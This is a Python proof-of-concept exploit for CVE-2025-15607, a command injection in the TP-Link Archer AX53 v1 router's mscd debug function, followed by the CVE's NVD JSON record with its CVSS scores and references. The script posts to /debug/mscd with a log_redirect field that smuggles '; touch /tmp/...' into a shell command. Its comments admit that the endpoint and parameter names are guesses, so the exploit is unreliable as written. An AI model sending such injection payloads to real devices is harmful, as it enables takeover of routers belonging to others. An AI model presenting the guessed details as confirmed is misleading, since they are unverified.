CVE-2025-15607

import requests # PoC for CVE-2025-15607: Command Injection in TP-Link AX53 # This script demonstrates how an attacker might exploit the mscd debug functionality. # Target: TP-Link Archer AX53 v1 def exploit(target_ip): # The vulnerable endpoint is typically a debug interface url = f"http://{target_ip}/debug/mscd" # Payload injects a command to create a file as proof of execution # Based on the description, the input allows log redirection and command concatenation # ; or && characters are often used to chain commands in shell injection injection_payload = "; touch /tmp/pwned_by_cve_2025_15607" # The vulnerable parameter might be related to log file path or debug settings # Assuming 'log_path' or similar parameter triggers the vulnerability data = { "enable_debug": "true", "log_redirect": f"/var/log/mscd.log {injection_payload}" } try: print(f"[*] Sending payload to {target_ip}...") response = requests.post(url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if command executed.") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") if __name__ == "__main__": # Replace with the actual IP address of the target device target = "192.168.0.1" exploit(target)

{"cve": {"id": "CVE-2025-15607", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-20T17:16:40.123", "lastModified": "2026-04-02T20:53:50.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability on AX53 v1 occurs in mscd debug functionality due to insufficient input handling, allowing log redirection to arbitrary files and concatenation of unvalidated file content into shell commands, enabling authenticated attackers to inject and execute arbitrary commands. Successful exploitation may allow execution of malicious commands and ultimately full control of the device."}, {"lang": "es", "value": "Una vulnerabilidad de inyección de comandos en AX53 v1 ocurre en la funcionalidad de depuración de mscd debido a un manejo de entrada insuficiente, permitiendo la redirección de registros a archivos arbitrarios y la concatenación de contenido de archivos no validado en comandos de shell, lo que permite a atacantes autenticados inyectar y ejecutar comandos arbitrarios. La explotación exitosa puede permitir la ejecución de comandos maliciosos y, en última instancia, el control total del dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_ax53_firmware:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8C762E60-933C-4B61-84D1-0A6FE4D5E08E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_ax53:-:*:*:*:*:*:*:*", "matchCriteriaId": "394AAF99-8784-4872-8EED-A12B97C575E4"}]}]}], "references": [{"url": "https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5025/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}